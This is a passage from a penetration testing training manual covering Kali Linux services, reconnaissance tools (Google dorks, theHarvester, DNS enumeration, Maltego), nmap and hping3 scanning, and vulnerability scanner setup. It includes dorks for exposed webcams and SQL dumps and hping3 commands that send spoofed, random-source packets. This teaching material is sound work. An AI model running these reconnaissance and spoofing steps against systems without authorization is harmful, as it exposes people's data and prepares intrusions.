For any user ID found to be inadvertently disabled, we will notify the customer test
monitor and/or appropriate engagement coordinator to enable the prompt
restoration of access.
j) Any procedures that have potential negative impact on network traffic or interruption
will be avoided. Where necessary to demonstrate to Customer the full nature and
extent of vulnerability, such procedure will both be performed during off-peak hours
and will be demonstrated to Customer’s management.
9. Notification Procedures: An appointed Customer’s designee will review Company X
activities to validate that testing is performed in accordance with this Rules of
Engagement.
10. Reporting: The results of this review will be presented only to designated officials of
Customer.
11. Agreement to Test Objectives: The following parties have acknowledged and agree to
the test objectives, scope, rules to be followed and the notification procedures. Signature
below constitutes authorization to Company X to commence with the penetration test
described above.
TRANCHULAS | www.tranchulas.com 44
Hands-On Ethical Hacking and Penetration Testing Training Course

TRANCHULAS | www.tranchulas.com 45
Hands-On Ethical Hacking and Penetration Testing Training Course

Module 3: Introduction to Kali

Linux

TRANCHULAS | www.tranchulas.com 46
Hands-On Ethical Hacking and Penetration Testing Training Course

Familiarize with Directory Structure

Open Terminal.
Browse the directory by typing following commands:

root@kali:~# ls
Desktop Documents Downloads Music Pictures Public
Templates Videos
root@kali:~#

To get detailed information about directories use the following command:

root@kali:~# ls -l
total 32
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Desktop
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Documents
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Downloads
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Music
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Pictures
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Public
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Templates
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Videos

To change directory, type the following command:

root@kali:~# cd Desktop/
root@kali:~/Desktop# cd /bin/
root@kali:/bin#

Changing Password

root@kali:~# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@kali:~#

TRANCHULAS | www.tranchulas.com 47
Hands-On Ethical Hacking and Penetration Testing Training Course

Search Files
Run updatedb command to build local database of all files on filesystem before running locate
utility.

root@kali ~ # updatedb
root@kali ~ # locate password.txt
/usr/share/cisco-torch/password.txt

Starting Network Services

To check your current IP Address, open terminal and type:

root@kali ~ # ifconfig eth0

eth0 Link encap:Ethernet HWaddr 00:0c:29:7f:14:1f
inet addr:192.168.1.113 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe7f:141f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:493 errors:0 dropped:0 overruns:0 frame:0
TX packets:29 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:47638 (47.6 KB) TX bytes:3184 (3.1 KB)

Here eth0 is interface.

If you don’t get IP address from DHCP then your network requires you to assign a static IP. Let’s
assume following network settings:

• Host IP: 192.168.1.3

• Subnet mask: 255.255.255.0
• Default gateway: 192.168.1.1
• DNS Server: 192.168.1.100

root@kali ~ # ifconfig eth0 192.168.1.3/24

root@kali ~ # route add default gw 192.168.1.1
root@kali ~ # echo nameserver 192.168.1.100 > /etc/resolv.conf

TRANCHULAS | www.tranchulas.com 48
Hands-On Ethical Hacking and Penetration Testing Training Course

SSH
Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel
between two networked devices. The SSH server can be used for SSH Tunneling, remote access
etc.
If you are running Kali Linux for the first time after installation you need to generate SSH keys
before starting this service. Follow the steps below to generate the keys:
First create a directory by name of default_kali_keys using mkdir command. Then we will move
ssh_host_* file to the newly created directory.

root@root:~# cd /etc/ssh
root@root:/etc/ssh# mkdir default_kali_keys
root@root:/etc/ssh# mv ssh_host_* default_kali_keys/

Now we will reconfigure SSH server

root@root:/etc/ssh# dpkg-reconfigure openssh-server

Creating SSH2 RSA key; this may take some time ...
Creating SSH2 DSA key; this may take some time ...
Creating SSH2 ECDSA key; this may take some time ...
insserv: warning: current start runlevel(s) (empty) of script `ssh' overrides LSB defaults (2 3 4
5).
insserv: warning: current stop runlevel(s) (2 3 4 5) of script `ssh' overrides LSB defaults
(empty).

Create an md5 hash of the ssh_host_*. These include all the key files

root@root:/etc/ssh/default_kali_keys# md5sum ssh_host_*

7d7bbb97743c0bba379a3362ad9b20b1 ssh_host_dsa_key
6adef7ad7490147afc667bdcc1f907dc ssh_host_dsa_key.pub
f39c4836cddd24e16a9d64d4370117fa ssh_host_ecdsa_key
c5f0bf794433b8de356168f3bafe482d ssh_host_ecdsa_key.pub
0e29301d2d391806f2e67efa14dc5baf ssh_host_rsa_key
491f88b015519fa2e3ea6d2b99b4d1f5 ssh_host_rsa_key.pub

TRANCHULAS | www.tranchulas.com 49
Hands-On Ethical Hacking and Penetration Testing Training Course

Move to the defalut_kali_keys directory and create and md5 hash of all the files

root@root:/etc/ssh# cd default_kali_keys/
root@root:/etc/ssh/default_kali_keys# md5sum *
7d7bbb97743c0bba379a3362ad9b20b1 ssh_host_dsa_key
6adef7ad7490147afc667bdcc1f907dc ssh_host_dsa_key.pub
f39c4836cddd24e16a9d64d4370117fa ssh_host_ecdsa_key
c5f0bf794433b8de356168f3bafe482d ssh_host_ecdsa_key.pub
0e29301d2d391806f2e67efa14dc5baf ssh_host_rsa_key
491f88b015519fa2e3ea6d2b99b4d1f5 ssh_host_rsa_key.pub

Now start SSH

root@root:~# service ssh start

To verify server is up type the following command

root@root:~# netstat -antp | grep 22

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 4202/sshd
tcp6 0 0 :::22 :::* LISTEN 4202/sshd

To stop SSHD server

root@root:~# service ssh stop

VNC Server

In computing, Virtual Network Computing (VNC) is a graphical desktop sharing system that uses
the RFB (Remote Frame Buffer) protocol to remotely control another computer. It transmits the
keyboard and mouse events from one computer to another, relaying the graphical screen
updates back in the other direction, over a network.

root@kali:~# vncserver
You will require a password to access your desktops.
Password: ********
Verify: ********

TRANCHULAS | www.tranchulas.com 50
Hands-On Ethical Hacking and Penetration Testing Training Course

Password too long - only the first 8 characters will be used

New 'bt:1 (root)' desktop is bt:1
Creating default startup script /root/.vnc/xstartup
Starting applications specified in /root/.vnc/xstartup
Log file is /root/.vnc/bt:1.log

To verify the server is running

root@kali:~# netstat -antp |grep 5901

tcp6 0 0 :::5901 :::* LISTEN 3480/Xvnc4

To stop VNC server:

root@kali:~# vncserver -kill :1

Killing Xtightvnc process ID 3480

Apache

Apache is the world's most widely used web server software. It comes pre-installed in Kali. To
start apache service

root@kali:~# service apache2 start

Verify if Apache is running by browsing 127.0.0.1 or enter the following command

root@kali:~# netstat -antp |grep 80

tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 4031/apache2

To stop Apache service

root@kali:~# service apache2 stop

TFTPD
Trivial File Transfer Protocol (TFTP) is a simple, file transfer protocol which allows a client to get
from or put a file onto a remote host. It allows us to transfer files between two computers.
To start TFTPD

root@root:~# atftpd --daemon --port 69 /tmp

TRANCHULAS | www.tranchulas.com 51
Hands-On Ethical Hacking and Penetration Testing Training Course

To verify if TFTPD is running

root@kali:~# netstat -anup |grep 69

udp 0 0 0.0.0.0:69 0.0.0.0:* 4545/atftpd

To stop TFTPD

root@kali:~# kill 4545

TRANCHULAS | www.tranchulas.com 52
Hands-On Ethical Hacking and Penetration Testing Training Course

Module 4: Information Gathering

TRANCHULAS | www.tranchulas.com 53
Hands-On Ethical Hacking and Penetration Testing Training Course

Google Hacking
Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data
by using search engines. It is used to find security holes in configuration and the code that the
websites and web applications are using. Google hacking involves using advanced operators in
the Google search engine to locate specific strings of text within search results.
Special search operators are used in Google to narrow down results. Here are some advanced
operators

More details on advanced operators can be found here:

http://www.google.com/help/operators.html

If we want of find results of only microsoft.com type site:microsoft.com. This will restrict the
result to microsoft.com.

TRANCHULAS | www.tranchulas.com 54
Hands-On Ethical Hacking and Penetration Testing Training Course

To find all PDF files present on microsoft.com, we will use the following Google query:
filetype:pdf site:microsoft.com

TRANCHULAS | www.tranchulas.com 55
Hands-On Ethical Hacking and Penetration Testing Training Course

Devices connected to the internet can also be found. Type inurl:"ViewerFrame?Mode=" and we
will find public web cameras.

TRANCHULAS | www.tranchulas.com 56
Hands-On Ethical Hacking and Penetration Testing Training Course

Google Hacking Database

Google Hacking search terms also known as Google Dorks are stored in a project called Google
Hacking Database. It can be accessed here:
https://www.exploit-db.com/google-hacking-database

For example MySQL backups are placed on server and have .sql extension. These backups have
critical information e.g. usernames, passwords, credit cards etc. Try following search query in
Google: mysql dump filetype:sql

TRANCHULAS | www.tranchulas.com 57
Hands-On Ethical Hacking and Penetration Testing Training Course

Email Harvesting
Email harvesting is the process of obtaining lists of email addresses using various methods. A tool
in Kali named theHarvester is used for gathering e-mail accounts, user names and
hostnames/subdomains from different public sources. Open terminal and type the following
command:

root@root:~# theharvester -d hotmail.com -l 50 -b google

*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.5 *
* Coded by Christian Martorella *
* Edge-Security Research *
* [email protected] *

[-] Searching in Google:

Searching 0 results...
Searching 50 results..

It gets email addresses from public sources. In the above command it has fetched 50 email
addresses which included hotmail.com from Google.

TRANCHULAS | www.tranchulas.com 58
Hands-On Ethical Hacking and Penetration Testing Training Course

Netcraft
Netcraft provides web server and web hosting market-share analysis, including web server and
operating system detection. In some cases, depending on the queried server's operating system,
their service is able to monitor uptimes; uptime performance monitoring is a commonly used
factor in determining the reliability of a web hosting provider.
Go to www.netcraft.com

Type your website URL. For example tranchulas.com and you will get a report about the site

TRANCHULAS | www.tranchulas.com 59
Hands-On Ethical Hacking and Penetration Testing Training Course

Nslookup
nslookup is a network administration command-line tool available for many computer operating
systems for querying the Domain Name System (DNS) to obtain domain name or IP address
mapping or for any other specific DNS record.

root@root:~# nslookup
> www.tranchulas.com
Server: 192.168.1.1
Address: 192.168.1.1#53

Non-authoritative answer:
www.tranchulas.com canonical name = tranchulas.com.
Name: tranchulas.com
Address: 192.254.191.25

To find Mail Servers

root@root:~# nslookup
> set type=mx
> tranchulas.com
Server: 192.168.1.1
Address: 192.168.1.1#53

Non-authoritative answer:
tranchulas.com mail exchanger = 10 aspmx3.googlemail.com.
tranchulas.com mail exchanger = 1 aspmx.l.google.com.
tranchulas.com mail exchanger = 5 alt1.aspmx.l.google.com.
tranchulas.com mail exchanger = 5 alt2.aspmx.l.google.com.
tranchulas.com mail exchanger = 10 aspmx2.googlemail.com.

To find Name Servers

root@root:~# nslookup
> set type=ns
> tranchulas.com
Server: 192.168.1.1
Address: 192.168.1.1#53

Non-authoritative answer:
tranchulas.com nameserver = ns6287.hostgator.com.

TRANCHULAS | www.tranchulas.com 60
Hands-On Ethical Hacking and Penetration Testing Training Course

tranchulas.com nameserver = ns6288.hostgator.com.

DNSEnum

DNSenum is a pentesting tool that enumerates as much DNS information about domains as
possible.

root@root:~# dnsenum tranchulas.com -f /usr/share/dnsenum/dns.txt

dnsenum.pl VERSION:1.2.3

----- tranchulas.com -----

Host's addresses:
__________________

tranchulas.com. 14110 IN A 192.254.191.25

Name Servers:
______________

ns6287.hostgator.com. 21423 IN A 50.87.144.180

ns6288.hostgator.com. 21423 IN A 192.254.184.236

Mail (MX) Servers:

___________________

aspmx2.googlemail.com. 293 IN A 173.194.72.27

aspmx3.googlemail.com. 293 IN A 74.125.25.27
aspmx.l.google.com. 226 IN A 74.125.68.26
alt1.aspmx.l.google.com. 293 IN A 173.194.72.26
alt2.aspmx.l.google.com. 126 IN A 74.125.25.27

DNSmap
Dnsmap is mainly meant to be used by pentesters during the information gathering/enumeration
phase of infrastructure security assessments. During the enumeration stage, the security
consultant would typically discover the target company's IP netblocks, domain names, phone
numbers, etc. The tool enables to discover all subdomains associated to a given domain.

root@root:~# dnsmap tranchulas.com

dnsmap 0.30 - DNS Network Mapper by pagvac (gnucitizen.org)

TRANCHULAS | www.tranchulas.com 61
Hands-On Ethical Hacking and Penetration Testing Training Course

[+] searching (sub)domains for tranchulas.com using built-in wordlist

[+] using maximum random delay of 10 millisecond(s) between requests
cpanel.tranchulas.com
IP address #1: 192.254.191.25

Maltego
Maltego, is an open source application that allows for the mining and gathering of information
as well as the representation of this information in a meaningful way.
Maltego is a program that can be used to determine the relationships and real world links
between:

• People
• Groups of people (social networks)
• Companies
• Organizations
• Web sites
• Internet infrastructure such as:
o Domains
o DNS names
o Netblocks
o IP addresses
• Phrases
• Affiliations
• Documents and files
These entities are linked using open source intelligence. Maltego provides you with a graphical
interface that makes seeing these relationships instant and accurate - making it possible to see
hidden connections.
Maltego can be used for the information gathering phase of all security related work. It will save
you time and will allow you to work more accurately and smarter. Maltego aids you in your
thinking process by visually demonstrating interconnected links between searched items.
Maltego provide you with a much more powerful search, giving you smarter results. If access to
"hidden" information determines your success, Maltego can help you discover it.
To Open Maltego type “Maltego” in terminal.

root@root:~# maltego

TRANCHULAS | www.tranchulas.com 62
Hands-On Ethical Hacking and Penetration Testing Training Course

Maltego will open a wizard.

Register a new account and login

Select “Maltego Public Servers” and click Next. Now you are good to go

TRANCHULAS | www.tranchulas.com 63
Hands-On Ethical Hacking and Penetration Testing Training Course

Left side has searchable options sorted by infrastructure and Personnel

TRANCHULAS | www.tranchulas.com 64
Hands-On Ethical Hacking and Penetration Testing Training Course

We can use a domain as an example here. Drag and drop domain from searchable options to
main graph area.

TRANCHULAS | www.tranchulas.com 65
Hands-On Ethical Hacking and Penetration Testing Training Course

On the right side in the property view, edit default value paterva.com to your desired domain.

Right click on domain in graph and click on required search transform or just click on all
transforms. For more details on transforms please visit:
http://ctas.paterva.com/view/Category:Transforms

TRANCHULAS | www.tranchulas.com 66
Hands-On Ethical Hacking and Penetration Testing Training Course

Analyze the results. As you can see we have found a lot of information including but not limited
to email addresses, phone numbers, social networking profiles etc.
Exercise
Use Open Web Information Gathering techniques to find interesting information about your
organization.
1. Domains
2. IP ranges
3. Phone numbers / Addresses
4. Emails
5. Interesting stuff like PDFs / PPT

TRANCHULAS | www.tranchulas.com 67
Hands-On Ethical Hacking and Penetration Testing Training Course

Module 5: Scanning

TRANCHULAS | www.tranchulas.com 68
Hands-On Ethical Hacking and Penetration Testing Training Course

Introduction to Port Scanning

Since a TCP or UDP port is a place where information goes into and out of a computer, port
scanning identifies open doors to a computer. Port scanning has legitimate uses in managing
networks, but port scanning also can be malicious in nature if someone is looking for a weakened
access point to break into your computer.

TCP Port Scanning

The simplest port scanners use the operating system's network. If a port is open, the operating
system completes the TCP three-way handshake. Otherwise an error code is returned. This scan
mode has the advantage that the user does not require special privileges. This method is "noisy":
the services can log the sender IP address and Intrusion detection systems can raise an alarm.

SYN Scanning
SYN scan is another form of TCP scanning. Rather than using the operating system's network
functions, the port scanner generates raw IP packets itself, and monitors for responses. This scan
type is also known as "half-open scanning", because it never actually opens a full TCP connection.
The port scanner generates a SYN packet. If the target port is open, it will respond with a SYN-
ACK packet. The scanner host responds with a RST packet, closing the connection before the
handshake is completed.

UDP Scanning
UDP is a connectionless protocol so there is no equivalent to a TCP SYN packet. However, if a UDP
packet is sent to a port that is not open, the system will respond with an ICMP port unreachable
message. Most UDP port scanners use this scanning method, and use the absence of a response
to infer that a port is open. However, if a port is blocked by a firewall, this method will falsely
report that the port is open. If the port unreachable message is blocked, all ports will appear
open. This method is also affected by ICMP rate limiting.

Legal Implications

• In June 2003, an Israeli, Avi Mizrahi, was accused by the Israeli Police of the offense of
attempting the unauthorized access of computer material. He had port scanned the
Mossad website. He was acquitted of all charges on February 29, 2004. The judge ruled
that these kinds of actions should not be discouraged when they are performed in a
positive way.

TRANCHULAS | www.tranchulas.com 69
Hands-On Ethical Hacking and Penetration Testing Training Course

• A 17-year old Finn was accused of attempted computer break-in by a major Finnish bank.
On April 9, 2003, he was convicted of the charge by the Supreme Court and ordered to
pay US$ 12,000 for the expense of the forensic analysis made by the bank. In 1998, he
had port scanned the bank network in an attempt to access the closed network, but failed
to do so.
• In December 1999, Scott Moulton was arrested by the FBI and accused of attempted
computer trespassing under Georgia's Computer Systems Protection Act and Computer
Fraud and Abuse Act of America. At this time, his IT service company had an ongoing
contract with Cherokee County of Georgia to maintain and upgrade the 911 center
security. He performed several port scans on Cherokee County servers to check their
security and eventually port scanned a web server monitored by another IT company,
provoking a tiff which ended up in a tribunal. He was acquitted in 2000, the judge ruling
there was no damage impairing the integrity and availability of the network.

Nmap

• Nmap (“Network Mapper”) is an open source tool for network exploration and security
auditing. [3]
• It was designed to rapidly scan large networks, although it works fine against single hosts.
• Nmap uses raw IP packets in novel ways to determine:
o what hosts are available on the network
o what services (application name and version) those hosts are offering
o what operating systems (and OS versions) they are running
o what type of packet filters/firewalls are in use and dozens of other characteristics.
While Nmap is commonly used for security audits, many systems and network administrators
find it useful for routine tasks such as network inventory, managing service upgrade schedules,
and monitoring host or service uptime.
Let’s run a basic nmap scan on 192.168.2.5

root@kali:~# nmap 192.168.2.5

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-05 07:11 EST
Nmap scan report for 192.168.2.5
Host is up (0.18s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds

TRANCHULAS | www.tranchulas.com 70
Hands-On Ethical Hacking and Penetration Testing Training Course

3306/tcp open mysql

5357/tcp open wsdapi
49153/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

The port states recognized by Nmap:

Open

An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this
port. Finding these is often the primary goal of port scanning. Security-minded people know that
each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports,
while administrators try to close or protect them with firewalls without thwarting legitimate
users. Open ports are also interesting for non-security scans because they show services available
for use on the network.
Closed
A closed port is accessible (it receives and responds to Nmap probe packets), but there is no
application listening on it. They can be helpful in showing that a host is up on an IP address (host
discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it
may be worth scanning later in case some open up. Administrators may want to consider blocking
such ports with a firewall. Then they would appear in the filtered state, discussed next.
Filtered
Nmap cannot determine whether the port is open because packet filtering prevents its probes
from reaching the port. The filtering could be from a dedicated firewall device, router rules, or
host-based firewall software. These ports frustrate attackers because they provide so little
information. Sometimes they respond with ICMP error messages such as type 3 code 13
(destination unreachable: communication administratively prohibited), but filters that simply
drop probes without responding are far more common. This forces Nmap to retry several times
just in case the probe was dropped due to network congestion rather than filtering. This slows
down the scan dramatically.
Unfiltered
The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it
is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into
this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN
scan, may help resolve whether the port is open.
Open/ filtered

TRANCHULAS | www.tranchulas.com 71
Hands-On Ethical Hacking and Penetration Testing Training Course

Nmap places ports in this state when it is unable to determine whether a port is open or filtered.
This occurs for scan types in which open ports give no response. The lack of response could also
mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know
for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas
scans classify ports this way.
Closed/ filtered
This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only
used for the IP ID idle scan.

Scan all available ports

In basic scan only most commonly used ports are scanned. To scan all available ports we will use
the following command:

root@kali:~# nmap –p 1-65535 192.168.2.5

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-05 07:11 EST
Nmap scan report for 192.168.2.5
Host is up (0.18s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5357/tcp open wsdapi
49153/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

OS Fingerprinting
Nmap's can detect OS using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP
packets to the remote host and examines practically every bit in the responses.

root@kali:~# nmap -O 192.168.2.8

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-05 08:18 EST

Nmap scan report for 192.168.2.5
Host is up (0.18s latency).

TRANCHULAS | www.tranchulas.com 72
Hands-On Ethical Hacking and Penetration Testing Training Course

Not shown: 988 closed ports

PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Device type: general purpose|firewall|storage-misc
Running (JUST GUESSING): Linux 2.6.X|3.X (87%), WatchGuard Fireware 11.X (87%), Synology
Linux (86%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:watchguard:fireware:11
cpe:/o:synology:linux_kernel cpe:/o:linux:linux_kernel:3
Aggressive OS guesses: Linux 2.6.32 (87%), WatchGuard Fireware 11.8 (87%), Synology
DiskStation Manager 5.1 (86%), Linux 2.6.39 (86%), Linux 3.10 (86%), Linux 3.4 (86%), Linux
2.6.32 - 2.6.35 (85%), Linux 3.1 - 3.2 (85%), Linux 2.6.32 - 2.6.39 (85%), Linux 2.6.38 (85%)

Scanning the network

root@kali:~# nmap -p 80 192.168.2.*

Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-18 10:24 PKT
Nmap scan report for 192.168.2.5
Host is up (0.18s latency).
PORT STATE SERVICE
80/tcp open http

Nmap scan report for 192.168.2.6

Host is up (0.18s latency).
PORT STATE SERVICE
80/tcp open http

Nmap scan report for 192.168.2.7

Host is up (0.18s latency).
PORT STATE SERVICE
80/tcp open http

TRANCHULAS | www.tranchulas.com 73
Hands-On Ethical Hacking and Penetration Testing Training Course

Service Enumeration

root@kali:~# nmap -sV 192.168.2.8

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-05 08:01 EST

Nmap scan report for 192.168.2.8
Host is up (0.18s latency).
Not shown: 981 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)

Zenmap
Zenmap is the GUI version of nmap. To access zenmap type zenmap in terminal

TRANCHULAS | www.tranchulas.com 74
Hands-On Ethical Hacking and Penetration Testing Training Course

Nmap Scripting Engine – Basic Usage

Nmap is not only a port scanner that could be used for scanning ports on a machine but also
contains a script engine that offers the ability to execute scripts that could be used for more in-
depth discovery of a target.
Nmap includes a variety of ready-made scripts that could be used for that reason. You can run
scripts one at a time or you can execute scripts by category. Of course Nmap offers the option to
executemultiple scripts at a time.
Currently the Nmap has the following Script Categories:

Execute SMB Version Scanning Script

Following command executes SMB versioning script which allows us to detect the SMB version
and operating system version details

TRANCHULAS | www.tranchulas.com 75
Hands-On Ethical Hacking and Penetration Testing Training Course

root@kali:~# nmap --script smb-os-discovery 192.168.2.9

Run Default Scripts

The default scripts category will expose information about the operating system, the workgroup
name, the netbios names etc.

root@kali:~# nmap --script default 192.168.2.9

Running External Sources Script

There is a category of scripts called external that performs an automatic Web Whois to the target
and discovers additional information like the geographical location, the name of the organization
and the net range.

root@kali:~# nmap --script external tranchulas.com

Hping
Often considered a complementary tool to Nmap, hping is used for network scanning, as well as
crafting TCP/IP packets. Please note that given the packet crafting involved, if you are running as
root yet you receive an error saying that the operation is not permitted it could be due to a host
firewall.
Send TCP SYN packets to port 0 on host example.com (note that hping will increment the source
port by 1 for each packet sent):

hping3 example.com -S -V
Send TCP SYN packets to port 443 on host example.com:

hping3 example.com -S -V -p 443

Send TCP packets to port 443 on host example.com with the SYN + ACK flags set:

hping3 example.com -S -A -V -p 443

TRANCHULAS | www.tranchulas.com 76
Hands-On Ethical Hacking and Penetration Testing Training Course

Send TCP packets to port 443 on host example.com with the SYN + ACK + FIN flags set:

hping3 example.com -S -A -F -V -p 443

Send TCP SYN packets every 5 seconds to port 443 on host example.com:

hping3 example.com -S -V -p 443 -i 5

Send TCP SYN packets every 100,000 microseconds (i.e. every 0.1 second or 10 per second) to
port 443 on host example.com. Note that verbose has been removed:

hping3 example.com -S -p 443 -i u100000

Send TCP SYN packets every 10,000 microseconds (i.e. every 0.01 second or 100 per second) to
port 443 on host example.com:

hping3 example.com -S -p 443 -i u10000

Send TCP SYN packets every 10,000 microseconds (i.e. every 0.01 second or 100 per second) to
port 443 on host example.com. Stop after 500 packets:

hping3 example.com -S -p 443 -i u10000 -c 500

Send UDP packets to port 111 on host example.com (argument --udp can be substituted with -
2):

hping3 example.com --udp -V -p 111

Send ICMP echo request packets to host example.com (argument --icmp can be substituted with
-1):

hping3 example.com --icmp -V

Send ICMP timestamp request packets to host example.com:

hping3 example.com --icmp --icmp-ts -V

Portscan TCP ports 100 to 110 on host example.com (argument --scan can be substituted with -
8)

hping3 example.com -V --scan 100-110

Send UDP packets spoofed to be from source host 192.168.1.150 to host example.com

TRANCHULAS | www.tranchulas.com 77
Hands-On Ethical Hacking and Penetration Testing Training Course

hping3 example.com --udp --spoof 192.168.1.150

Send UDP packets spoofed to be from various random source IP addresses to host example.com

hping3 example.com --udp --rand-source

Send UDP packets with the data portion padded with 100 bytes to host example.com

hping3 example.com -V --udp --data 100

Send UDP packets with the data portion padded with 100 bytes but containing the contents of
payload.txt to host example.com (the payload will be truncated if it is smaller than what is
specified by the --data argument)

hping3 example.com -V --udp --file payload.txt --data 100

Sparta
Sparta is a python GUI application which simplifies scanning and enumeration phase. To install
Sparta perform the following steps:

root@kali:# sparta

A GUI is presented to the user

TRANCHULAS | www.tranchulas.com 78
Hands-On Ethical Hacking and Penetration Testing Training Course

Click to add host

Sparta will start active scan of the host. Sparta uses Nmap in a staged process. It will start the
initial scan of limited ports, starts Nikto for any web ports and performs screen capture. After
stage 1 scan finishes, it will start much deeper stage 2 and stage 3 scans.

TRANCHULAS | www.tranchulas.com 79
Hands-On Ethical Hacking and Penetration Testing Training Course

Module 6: Vulnerability Scanning

TRANCHULAS | www.tranchulas.com 80
Hands-On Ethical Hacking and Penetration Testing Training Course

What is OpenVAS?
The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and
tools offering a comprehensive and powerful vulnerability scanning and vulnerability
management solution.

Setting up and Scanning with OpenVAS

To install OpenVAS

root@kali:# apt-get install openvas

Select OpenVAS initial setup from menu. This will perform some functions to get OpenVAS ready:

Favorites -> Vulnerability Analysis -> openvas initial setup

After completion of setup, check openvas setup by clicking openvas check setup from menu.
This module will inform any missing modules of OpenVas. If installation is not complete, follow
the steps mentioned in results of openvas check setup. It may ask you to sync, for that use the
following command:
openvas-scapdata-sync
Once installed, you need to start OpenVAS services.

TRANCHULAS | www.tranchulas.com 81
Hands-On Ethical Hacking and Penetration Testing Training Course

Open your browser Iceweasel on kali and type the following URL:
https://127.0.0.1:9392 or https://localhost:9392
Confirm the Security Exception and you will see the login page

Default username is admin and password is same as given in installation process.

TRANCHULAS | www.tranchulas.com 82
Hands-On Ethical Hacking and Penetration Testing Training Course

Update your Vulnerability database feed by clicking Administration ->NVT Feed. After updating
the NVT Feed and CERT Feed, go to scan targets under the menu configuration. Here you can
specify the targets.

The next step is to create a task. Click on New task under the menu of scan management.

TRANCHULAS | www.tranchulas.com 83
Hands-On Ethical Hacking and Penetration Testing Training Course

You can run the scan now

Nexpose Vulnerability Scanner

Nexpose proactively scans your environment for misconfigurations, vulnerabilities, and
malwares. It provides guidance for mitigating risks. It automatically discover and inventory IT
assets and the applications and services running on them, including IPv6, virtual and cloud hosted
assets. Nexpose correlates threats such as vulnerabilities, misconfigurations, policy violations,
exposure to exploits and malware across all of the assets, including operating systems, networks,
databases and web applications. Prioritization schemes such as CVSS scoring by incorporating
TRANCHULAS | www.tranchulas.com 84
Hands-On Ethical Hacking and Penetration Testing Training Course

factors such as exposure to exploits, malware and the age of vulnerabilities into a single
prioritized risk score. It also filters your vulnerabilities across 145 signal categories to easily
prioritize remediation and mitigate risk in your environment. Set up mitigating controls and act
on exploitable vulnerabilities with practical remediation advice.

Installation
1. Nexpose is available online and can be downloaded from:
https://www.rapid7.com/products/nexpose/compare-downloads.jsp

2. Click on Free Trial of Enterprise version.

TRANCHULAS | www.tranchulas.com 85
Hands-On Ethical Hacking and Penetration Testing Training Course

3. You can select any one of the options. Let’s choose Windows/Linux.
4. Fill the form. You will need a corporate email address to complete the form.

5. Once you have registered. You will get an email which will contain the key and link to the
download.

TRANCHULAS | www.tranchulas.com 86
Hands-On Ethical Hacking and Penetration Testing Training Course

